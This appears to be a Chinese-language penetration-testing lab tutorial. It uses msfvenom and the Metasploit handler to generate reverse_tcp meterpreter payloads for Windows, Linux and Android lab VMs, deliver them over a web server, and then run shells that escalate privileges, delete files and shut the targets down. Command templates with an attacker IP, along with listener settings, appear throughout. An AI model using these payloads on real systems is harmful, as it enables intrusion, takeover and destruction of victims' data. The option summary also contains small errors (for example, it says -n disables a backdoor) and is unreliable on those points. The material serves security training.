目录
步骤一:生成Windows操作系统下的被控端并放入目标靶机运行
步骤三 :到目标靶机(Metasploitable2-Linux)下载攻击载荷并运行。
步骤四:控制目标靶机(Metasploitable2-Linux)
步骤一:生成android操作系统下的被控端并放入目标靶机运行
步骤三 :到目标靶机(android-86_64-7.1-r5)下载攻击载荷并运行。
步骤四:控制目标靶机(android-86_64-7.1-r5)
`msfvenom`是Metasploit框架中的一个强大工具,用于生成各种类型的恶意软件payload。它允许安全专业人员在渗透测试和漏洞利用过程中创建自定义的恶意代码。
`msfvenom`的主要功能是生成不同类型的payload,如反向TCP连接、HTTP和HTTPS反向连接、单独的Shellcode以及多种编码格式。它还提供了灵活的选项,使用户能够自定义生成的payload。
以下是一些`msfvenom`的常见用法:
1. 生成反向TCP连接的payload:
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output file>
2. 生成一个不带后门的payload:
msfvenom -p <payload> -f <format> -o <output file>
3. 使用编码器对payload进行编码:
msfvenom -p <payload> -e <encoder> -f <format> -o <output file>
4. 生成一个具有自定义漏洞利用参数的payload:
msfvenom -p <payload> RHOST=<target IP> RPORT=<target port> -f <format> -o <output file>
请注意,在使用`msfvenom`时,确保您有合法的使用授权并遵守相关法律法规。此工具仅用于合法的渗透测试和安全研究目的。
前导练习:
1.查看帮助信息
msfvenom -h
2.查看所有可以使用的攻击模块
msfvenom --list payloads
3.筛选出使用reverse_tcp的模块
msfvenom --list payloads | grep reverse_tcp
4.使用--list-options选项查看攻击载荷需要设置的参数。
使用msfvenom生成被控端并进行远程控制
生成windows系统下的被控端并进行远程控制
测试windows系统实验使用的网络环境,填写以下IP地址:
测试用windows系统(WinXPenSP)的IP: 192.168.17.15
虚拟机Kali Linux 2的IP: 192.168.17.131
步骤一:生成Windows操作系统下的被控端并放入目标靶机运行
options(选项):
-p 指定要生成的攻击荷载(payload)
-f 输出格式(format)
-o 输出(out)存储payload的位置
将被控端payload.exe生成到/var/payload.exe
打开apache2
靶机下载被控端并打开
步骤二 :启动主控端
1.启动metasploit,进入metasploit(msf)的控制台。
2.使用handler模块,然后配置参数。
(1)use exploit/multi/handler
(2)设置攻击载荷为windows/meterpreter/reverse_tcp
(3)设置lhost为kali的IP
(4)设置lport为20000
(5)发起进攻(等待目标靶机上线)是否建立会话?
步骤三:控制目标靶机(WinXPenSP3)
输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。
查看操作系统信息
查看目标靶机有哪些磁盘
延时关闭系统并弹出提示框
退出控制
生成linux系统下的被控端并进行远程控制
测试linux系统实验使用的网络环境,填写以下IP地址:
测试用linux系统(Metasploitable2-Linux)的IP: 192.168.17.129
虚拟机Kali Linux 2的IP: 192.168.17.131
步骤一:生成linux操作系统下的被控端并放入目标靶机运行
1、查看linux的攻击载荷
msfvenom -l payloads | grep reverse_tcp
2、生成被控端
(1)将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下,稍后到靶机中用浏览器下载并运行。
(2)检查apache2服务是否启动,如果未启动apache2服务,则需要启动。
步骤二 :启动主控端
启动metasploit,进入metasploit(msf)的控制台。
使用handler模块,然后配置参数。
设置攻击载荷为linux/x86/meterpreter/reverse_tcp
设置lhost为kali的IP
设置lpost为20001
发起攻击(等待目标靶机Metasploitable2-Linux上线)exploit
步骤三 :到目标靶机(Metasploitable2-Linux)下载攻击载荷并运行。
下载被控端
查看被控端是否给了执行权限,没给则需要添加执行权限。
运行被控端
返回到kali,是否建立会话?
步骤四:控制目标靶机(Metasploitable2-Linux)
输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。
(1)查看操作系统信息
(2)查看主机名
(3)查看IP地址
(4)使用curl命令访问kali的网页
(5)退出控制
生成android系统下的被控端并进行远程控制
测试android系统实验使用的网络环境,填写以下IP地址:
测试用android系统的IP: 192.168.17.130
虚拟机Kali Linux 2的IP: 192.168.17.131
步骤一:生成android操作系统下的被控端并放入目标靶机运行
1.查看android的攻击载荷(只查看使用reverse_tcp)
生成被控端
(1)将被控端androidpayload.exe生成到网站的目录(/var/www/html/)下
(2)检查apache2服务是否启动,如果未启动apache2服务,则需要启动。
步骤二 :启动主控端
- 启动metasploit,进入metasploit(msf)的控制台。
2、使用handler模块,然后配置参数。
(1)使用handler模块
(2)设置攻击载荷为android/meterpreter/reverse_tcp
(3)设置lhost为kali的IP
(4)设置lpost为20002
(5)发起攻击(等待目标靶机android-86_64-7.1-r5上线)
步骤三 :到目标靶机(android-86_64-7.1-r5)下载攻击载荷并运行。
- 下载被控端
2、运行被控端
返回到kali,是否建立了会话?
步骤四:控制目标靶机(android-86_64-7.1-r5)
输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。
1.输入:shell
2.查看当前用户名
3.查看操作系统信息
4.尝试切换到root用户
(1)在安卓虚拟机中弹出提示信息,选择“拒绝”。在kali中可以看到什么结果?
(2)在安卓虚拟机中弹出提示信息,选择“允许”。
在kali中可以看到什么结果?
在kali中输入whoami,显示当前用户。
切换为root用户之后,可以对安卓机进行最大权限的控制。
I:显示根目录的文件
II:进入存储卡中的下载目录(sdcard/Download),查看当前目录的文件。
III:删除Download目录中的文件
IV:关闭系统
关闭系统之后,主控端无法再继续控制了。
3、退出
msfvenom
的使用方法的总结:
-
生成payload:
- 使用
-p
选项指定payload类型,例如:windows/meterpreter/reverse_tcp
- 使用
LHOST
和LPORT
选项指定攻击者的IP地址和端口 - 使用
-f
选项指定输出格式,例如:exe
,apk
,php
,raw
- 使用
-o
选项指定输出文件的路径和名称
- 使用
-
配置payload参数:
- 使用
RHOST
和RPORT
选项指定目标的IP地址和端口 - 其他选项根据不同payload类型而有所不同
- 使用
-
编码payload:
- 使用
-e
选项指定编码器,例如:x86/shikata_ga_nai
- 使用
-
其他常用选项:
- 使用
--list
选项列出可用的payload、编码器、nop等模块 - 使用
--help
选项获取帮助信息 - 使用
-n
选项关闭payload的后门
- 使用